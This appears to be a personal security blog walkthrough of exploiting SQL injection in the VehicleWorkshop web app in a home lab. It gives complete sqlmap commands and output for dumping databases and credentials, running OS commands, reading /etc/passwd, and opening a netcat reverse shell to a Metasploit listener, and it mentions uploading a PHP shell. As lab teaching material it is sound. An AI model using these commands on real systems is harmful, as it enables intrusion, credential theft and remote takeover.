sqlmap -- VehicleWorkshop SQL Injection
- by Vince
-
in Blog
-
Hits: 3670
VehicleWorkshop is vulnerable to SQL Injection and you can view the tidbit of information on Exploit-DB. Essentially, our injection point is "vehicleid=" but this isn't a login prompt, I can't use: bob' or 1=1;-- and while I don't like tools, this is definitely a job for sqlmap.
Before we get started, let's get this app setup. You can download the app from Exploit-DB, extract it to a folder, and setup the permissions with chmod 777. I wanted command execution which is why I gave the folder wrx. Without it, you won't be able to perform any of the os-shell commands. You can get into sql-shell and poke around but it's not nearly as fun.
Once you get the application installed, edit:
dbconnection.php
... and give it the correct mysql info. Then login into mysql, create a database titled:
eworkshop
... and logout of mysql. Now we're going to import the sql database:
mysql -u root -p eworkshop < ./db/eworkshop.sql
When we hit the site with our browser, we're presented with the login page. You don't need to login but if you wish, the username and password are admin : admin
With Burpsuite open, we're going to hit our vulnerable page:
Moving over to Burpsuite, we see the capture:
Now we're going to copy that data from Burpsuite and save it into a text file titled: post.txt
First thing we're going to do is take our post.txt data and feed it to sqlmap to see if it's injectable:
sqlmap -r post.txt -p vehicleid --level 5 --risk 3 --dbs --threads 10
After a minute or so, we're going to see:
GET parameter 'vehicleid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
We're going to take the default because we've got our entry with vehicleid. It then continues with injection and it spits out the available databases:
back-end DBMS: MySQL >= 5.0.12
[14:59:22] [INFO] fetching database names
[14:59:23] [INFO] used SQL query returns 3 entries
[14:59:23] [INFO] starting 5 threads
[14:59:24] [INFO] retrieved: information_schema
[14:59:24] [INFO] retrieved: mysql
[14:59:24] [INFO] retrieved: eworkshop
available databases [5]:
[*] eworkshop
[*] information_schema
[*] mysql
Excellent. We see our eworkshop database, now let's pull some table information:
sqlmap -r post.txt -p vehicleid -D eworkshop --columns --threads 10
[ For the sake of keeping your eyes on what's important, I'm truncating the output for all of the queries -- they are lengthy. ]
When sqlmap finishes, we are presented with two tables worth exploring. If this were a live server, we'd go after both of these tables but since the customer table is empty, I'm just pointing it out but won't poke any more into it.
Table: customer
[11 columns]
+-------------+-------------+
| Column | Type |
+-------------+-------------+
| address | text |
| city | varchar(25) |
| contactno1 | varchar(25) |
| contactno2 | varchar(25) |
| createddate | date |
| custid | int(10) |
| emailid | varchar(50) |
| fname | varchar(25) |
| lname | varchar(25) |
| password | varchar(15) |
| zipcode | varchar(15) |
+-------------+-------------+
Database: eworkshop
Table: employee
[9 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| contactno1 | varchar(25) |
| contactno2 | varchar(25) |
| emailid | varchar(25) |
| employeeid | int(10) |
| employeetype | varchar(25) |
| fname | varchar(25) |
| lname | varchar(25) |
| loginid | varchar(25) |
| password | varchar(25) |
+--------------+-------------+
Now that we have table and column information, let's get some login information:
sqlmap -r post.txt -p vehicleid -D eworkshop -T employee -C loginid,password --dump --threads 10
Note the password is sitting in clear text. :\
Database: eworkshop
Table: employee
[1 entry]
+---------+----------+
| loginid | password |
+---------+----------+
| admin | admin |
+---------+----------+
This is where the permissions set at 777 are going to allow us to move into os command execution. If the permissions on this folder were set correctly, we'd have to explore other avenues. That doesn't mean you can't pop this box, you can. This just makes it a lot quicker and it shows off the os-shell function of sqlmap.
Starting off with something simple:
sqlmap -r post.txt -p vehicleid -D eworkshop --os-cmd=whoami
You'll be prompted for a response on "web server support", stick with the default, 4:
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[15:13:34] [INFO] retrieved the web server document root: '/var/www'
[15:13:34] [INFO] retrieved web server absolute paths: '/var/www/VehicleWorkshop/viewvehiclestoremore.php'
[15:13:34] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[15:13:34] [INFO] heuristics detected web page charset 'ascii'
[15:13:34] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://192.168.0.52:80/tmpulbhh.php
[15:13:34] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://192.168.0.52:80/tmpbfwca.php
do you want to retrieve the command standard output? [Y/n/a]
command standard output: 'www-data'
[15:13:40] [INFO] cleaning up the web files uploaded
[15:13:40] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times
[15:13:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.0.52'
[*] shutting down at 15:13:40
If you look in: /root/.sqlmap/output/192.168.0.52
[ change the ip to reflect your machine's address ]
... you will find the log file containing the output from your commands. You can grep the file:
cat /root/.sqlmap/output/192.168.0.52/log | grep "command standard output"
command standard output: 'www-data'
command standard output:
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
You can go for something a little more interesting but we're working under the www-data account so you're not getting /etc/shadow.
sqlmap -r post.txt -p vehicleid -D eworkshop --os-cmd="cat /etc/passwd"
You know what a passwd file looks like. :)
Let's go deeper:
sqlmap -r post.txt -p vehicleid -D eworkshop --os-shell
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell>
os-shell> nc -e /bin/bash 192.168.0.51 53 &
do you want to retrieve the command standard output? [Y/n/a] y
No output
os-shell>
My listener is setup:
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.51:53
[*] Sending stage (36 bytes) to 192.168.0.52
[*] Command shell session 6 opened (192.168.0.51:53 -> 192.168.0.52:40556) at 2018-06-27 15:24:29 -0700
python -c 'import pty;pty.spawn("/bin/sh")'
export TERM=xterm
$ export TERM=xterm
$ whoami
whoami
www-data
$
At this point, I have my low privilege shell and I can work on privilege escalation.
I haven't played with this application other than sql injection, I'm going to see if I can use my admin : admin credentials and exploit this box another way for a low privilege shell.
I hope this is helpful.
Edit:
A few minutes after I posted this entry, I went back to the application because I had an idea. I wondered if I could upload a shell through the image upload function. Zero protection whatsoever. :)
/VehicleWorkshop/upload/rshell443.php
^^ I can haz all the shellz.
Rewinding a bit -- I gave the www folder wrx permissions to get os cmd execution but in the real world, you wouldn't have been able to perform those commands if the permissions were set correctly. However, you would have been able to retrieve the admin : admin credentials, at which point, you would have been able to upload the shell like I just did. You still get a low priv shell -- in the real world.